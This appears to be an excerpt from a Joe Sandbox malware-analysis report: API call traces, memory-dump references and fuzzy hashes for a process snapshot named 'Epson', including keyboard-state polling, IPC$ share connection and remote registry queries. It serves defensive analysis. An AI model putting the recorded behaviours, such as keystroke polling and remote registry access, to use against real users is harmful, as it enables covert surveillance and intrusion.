                                                                                                                                                                                                                                      • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00FB66C0
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00FB66D0
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00FB66E2
                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00FB6736
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00FB6744
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00FB6756
                                                                                                                                                                                                                                      • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00FB6798
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00FB67AB
                                                                                                                                                                                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00FB67C1
                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00FB67CE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3096461208-0
                                                                                                                                                                                                                                      • Opcode ID: ca081d12ae8fa199e3e6590edaa2b6f70823ba1fbf30929dd6dd9c14ba316d15
                                                                                                                                                                                                                                      • Instruction ID: 5b6ff4f5cd9d73b2cea1a72b1838ba5ca583bd26f254b77811d2e7437538eb02
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ca081d12ae8fa199e3e6590edaa2b6f70823ba1fbf30929dd6dd9c14ba316d15
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D6512FB1E00209AFDF18CF69DD89AAEBBB5FB48314F108129F919E7690DB749D049B50
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F51802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F51488,?,00000000,?,?,?,?,00F5145A,00000000,?), ref: 00F51865
                                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00F51521
                                                                                                                                                                                                                                      • KillTimer.USER32(00000000,?,?,?,?,00F5145A,00000000,?), ref: 00F515BB
                                                                                                                                                                                                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 00F929B4
                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00F5145A,00000000,?), ref: 00F929E2
                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00F5145A,00000000,?), ref: 00F929F9
                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00F5145A,00000000), ref: 00F92A15
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00F92A27
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 641708696-0
                                                                                                                                                                                                                                      • Opcode ID: 09c435d4b29d41bf88fe5c289fe8a967379e1a87c70ddd5cfdccd5eae8fd1805
                                                                                                                                                                                                                                      • Instruction ID: 80a5b411d1cac55ae42cc1e28a6a8ae548f74c8b8979fe1ea8ebe6681385a4fe
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 09c435d4b29d41bf88fe5c289fe8a967379e1a87c70ddd5cfdccd5eae8fd1805
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 57618D32A01705EFDB35DF54D948B2977B1FB81323F244518E9824AA64C77AB899FF80
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F52234: GetWindowLongW.USER32(?,000000EB), ref: 00F52242
                                                                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00F52152
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ColorLongWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 259745315-0
                                                                                                                                                                                                                                      • Opcode ID: 22b100c675a7cf01a0b5232f220c44c2b70c4175286b710ea447c07f0cbbea35
                                                                                                                                                                                                                                      • Instruction ID: 6f0a50e7e35bdab173d5aba0cc9644b49fe3e7fd6cf144421d0a5f8f09f65968
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 22b100c675a7cf01a0b5232f220c44c2b70c4175286b710ea447c07f0cbbea35
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA418231500A44AFEB245F289C84BBA3765AB46332F154355FFA28B2E1C7359D46FB50
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00FA0D31,00000001,0000138C,00000001,00000000,00000001,?,00FCEEAE,01022430), ref: 00FBA091
                                                                                                                                                                                                                                      • LoadStringW.USER32(00000000,?,00FA0D31,00000001), ref: 00FBA09A
                                                                                                                                                                                                                                        • Part of subcall function 00F5B329: _wcslen.LIBCMT ref: 00F5B333
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00FA0D31,00000001,0000138C,00000001,00000000,00000001,?,00FCEEAE,01022430,?), ref: 00FBA0BC
                                                                                                                                                                                                                                      • LoadStringW.USER32(00000000,?,00FA0D31,00000001), ref: 00FBA0BF
                                                                                                                                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00FBA1E0
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                                      • API String ID: 747408836-2268648507
                                                                                                                                                                                                                                      • Opcode ID: 396c0aef37b00527522d9b3541fb7ba860c81950070879963310ccc62d2319a1
                                                                                                                                                                                                                                      • Instruction ID: 7e7e34045d9c1f12ad54873ad9641038ad9939fabd388fea8a978190543ebff5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 396c0aef37b00527522d9b3541fb7ba860c81950070879963310ccc62d2319a1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83414372800209ABCB15FBE1DD46DEEB778AF54301F500065FA01B6052EB396F49EF61
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F58577: _wcslen.LIBCMT ref: 00F5858A
                                                                                                                                                                                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00FB1093
                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00FB10AF
                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00FB10CB
                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00FB10F5
                                                                                                                                                                                                                                      • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00FB111D
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00FB1128
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00FB112D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                                                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                      • API String ID: 323675364-22481851
                                                                                                                                                                                                                                      • Opcode ID: 6a44751813897bc18dcf44a9164e5c5df35ae71b7e8d892f4a4099062bd9e731
                                                                                                                                                                                                                                      • Instruction ID: cdf309ec5aa9ad5527758bd52fff99d3ea2fb744766f1069e2d91747a031ba7d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6a44751813897bc18dcf44a9164e5c5df35ae71b7e8d892f4a4099062bd9e731
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB411772C1022DABCF11EBA4DC95DEEB7B8BF04750F444129EA01A7161EB359E09DF90
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00FE4AD9
                                                                                                                                                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00FE4AE0
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00FE4AF3
                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00FE4AFB
                                                                                                                                                                                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00FE4B06
                                                                                                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 00FE4B10
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00FE4B1A
                                                                                                                                                                                                                                      • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00FE4B30
                                                                                                                                                                                                                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00FE4B3C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                                                                                      • String ID: static
                                                                                                                                                                                                                                      • API String ID: 2559357485-2160076837
                                                                                                                                                                                                                                      • Opcode ID: e10e12d56eaca0f80b1f1e2ecb50ca21f5c25d3b4f99e3168ebb53e64999d980
                                                                                                                                                                                                                                      • Instruction ID: 436d5f6a1a831bae627e6176b49c51f73d5cc0e7ca271ce80da4c7410f764857
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e10e12d56eaca0f80b1f1e2ecb50ca21f5c25d3b4f99e3168ebb53e64999d980
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AB318F32500259BBDF119FA5DC48FDA3BA9FF0D764F110224FA14EA1A0C779E850EB94
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00FD46B9
                                                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00FD46E7
                                                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 00FD46F1
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FD478A
                                                                                                                                                                                                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00FD480E
                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00FD4932
                                                                                                                                                                                                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00FD496B
                                                                                                                                                                                                                                      • CoGetObject.OLE32(?,00000000,00FF0B64,?), ref: 00FD498A
                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 00FD499D
                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00FD4A21
                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00FD4A35
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 429561992-0
                                                                                                                                                                                                                                      • Opcode ID: bc85c3ac0609b18e791277559089df0f4203a8b871538ee7d421381d8a2f066d
                                                                                                                                                                                                                                      • Instruction ID: 9693c0ca8d37fcc11ddc7a4bd05f42f3aaed91052db49847fa84474d0c785117
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc85c3ac0609b18e791277559089df0f4203a8b871538ee7d421381d8a2f066d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CAC13471A043459F9700DF68C88492BB7EAFF89758F08491EF98A9B250DB31ED05EB52
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00FC8538
                                                                                                                                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00FC85D4
                                                                                                                                                                                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 00FC85E8
                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(00FF0CD4,00000000,00000001,01017E8C,?), ref: 00FC8634
                                                                                                                                                                                                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00FC86B9
                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(?,?), ref: 00FC8711
                                                                                                                                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00FC879C
                                                                                                                                                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00FC87BF
                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00FC87C6
                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00FC881B
                                                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 00FC8821
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2762341140-0
                                                                                                                                                                                                                                      • Opcode ID: 13ece0eeca6c2c09f0a954b6dcd75c042b7d2de933085a2a705e4d148778df41
                                                                                                                                                                                                                                      • Instruction ID: bacb8d18f449a34ef5d7f8a467c13d80dd7dd1e38b34964e451022300528d1c7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 13ece0eeca6c2c09f0a954b6dcd75c042b7d2de933085a2a705e4d148778df41
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6AC14D75A00109EFCB00DFA4C985EAEBBF5FF48354B148498E919DB661DB30ED46DB90
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00FB039F
                                                                                                                                                                                                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00FB03F8
                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00FB040A
                                                                                                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00FB042A
                                                                                                                                                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00FB047D
                                                                                                                                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00FB0491
                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00FB04A6
                                                                                                                                                                                                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00FB04B3
                                                                                                                                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00FB04BC
                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00FB04CE
                                                                                                                                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00FB04D9
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2706829360-0
                                                                                                                                                                                                                                      • Opcode ID: 9496760d2023158c89d4a06110286fedc9d9fb8c425401d76c32fd0fabd0b971
                                                                                                                                                                                                                                      • Instruction ID: 990405e120bff7178b11dd8c7973738eb2ebd497f3a4672daee80a61bacd8dec
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9496760d2023158c89d4a06110286fedc9d9fb8c425401d76c32fd0fabd0b971
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 55417135A0021DDFCB10DFA5DC889EE7BB9EF18354F008069E905AB2A1CB34A945DF90
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 00FBA65D
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00FBA6DE
                                                                                                                                                                                                                                      • GetKeyState.USER32(000000A0), ref: 00FBA6F9
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00FBA713
                                                                                                                                                                                                                                      • GetKeyState.USER32(000000A1), ref: 00FBA728
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 00FBA740
                                                                                                                                                                                                                                      • GetKeyState.USER32(00000011), ref: 00FBA752
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 00FBA76A
                                                                                                                                                                                                                                      • GetKeyState.USER32(00000012), ref: 00FBA77C
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00FBA794
                                                                                                                                                                                                                                      • GetKeyState.USER32(0000005B), ref: 00FBA7A6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 541375521-0
                                                                                                                                                                                                                                      • Opcode ID: cd03889f58f98bf119cd8c9348277a93566e24aecef1baa3110f3e17c7c8e758
                                                                                                                                                                                                                                      • Instruction ID: 234d5163344934aa4d335e3fc8b8f6a948a94adf5ca2852bca718bd865fc4382
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cd03889f58f98bf119cd8c9348277a93566e24aecef1baa3110f3e17c7c8e758
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E41F478D087C96DFF31876188143E5BFB16B11324F58805AC5C24A5C2EFA499C8EFA3
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcslen$BuffCharLower
                                                                                                                                                                                                                                      • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                                                                      • API String ID: 707087890-567219261
